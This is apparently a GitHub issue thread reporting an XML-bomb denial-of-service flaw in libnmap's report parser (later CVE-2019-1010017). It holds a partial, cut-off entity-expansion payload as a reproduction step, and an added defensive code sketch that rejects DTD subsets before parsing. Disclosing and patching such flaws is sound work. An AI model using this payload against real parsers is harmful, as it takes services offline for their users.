XML Injection DoS attack #87

prodigysml opened this issue Feb 1, 2018 · 2 comments



commented Feb 1, 2018


Libnmap is vulnerable to XML Bomb attacks using the following:

Where the Issue Occurred

The issue occurs within parsing of XML reports for nmap. The exact line where the vulnerable parsing occurs is given below:

root = ET.fromstring(nmap_data)

Reproduction steps

Run the following code:

ty = NmapParser()

payload = """
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">



Python does not contain any fixes for this vulnerability, but that doesn't mean it can't be fixed. Searching for the word DOCTYPE, prior to parsing, and raising an exception should patch the issue.
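A sketch of the pre-parse check proposed above, as an added example that is not part of the original issue or of libnmap's code. It goes one step beyond a plain search for the word DOCTYPE: nmap's own XML output carries a bare `<!DOCTYPE nmaprun>` line, so the check rejects only a DOCTYPE that brings a DTD subset or external identifier, and any entity declaration. `safe_fromstring`, `UnsafeXMLError` and the sample documents are hypothetical names and constructed inputs.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXMLError(ValueError):
    """Raised when a report declares a DTD subset or entities."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # A bare "<!DOCTYPE nmaprun>" is allowed; an internal subset ("[ ... ]")
    # or an external identifier is where entity definitions come from.
    if has_internal_subset or system_id or public_id:
        raise UnsafeXMLError("DOCTYPE with DTD content: %s" % name)


def _reject_entity(name, is_param, value, base, system_id, public_id, notation):
    # Defence in depth: no legitimate report needs to declare entities.
    raise UnsafeXMLError("entity declaration: %s" % name)


def safe_fromstring(nmap_data):
    """Scan the document with expat first, then hand it to ElementTree.

    Hypothetical replacement for the ET.fromstring(nmap_data) call quoted
    in the issue; malformed XML still raises the usual parser errors.
    """
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.EntityDeclHandler = _reject_entity
    scanner.Parse(nmap_data, True)  # an exception raised by a handler propagates
    return ET.fromstring(nmap_data)


# Constructed sample inputs (not taken from the issue).
SAMPLE_REPORT = '<?xml version="1.0"?>\n<!DOCTYPE nmaprun>\n<nmaprun scanner="nmap"><host/></nmaprun>'
SAMPLE_WITH_ENTITY = '<!DOCTYPE r [ <!ENTITY a "x"> ]><r>&a;</r>'

if __name__ == "__main__":
    print(safe_fromstring(SAMPLE_REPORT).tag)
    try:
        safe_fromstring(SAMPLE_WITH_ENTITY)
    except UnsafeXMLError as exc:
        print("rejected:", exc)
```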



commented Jul 15, 2019

This apparently was assigned CVE-2019-1010017.



commented Jul 15, 2019

It seems there has been some work on XML bomb attacks in the past. Maybe it's best to update here and get it fixed?
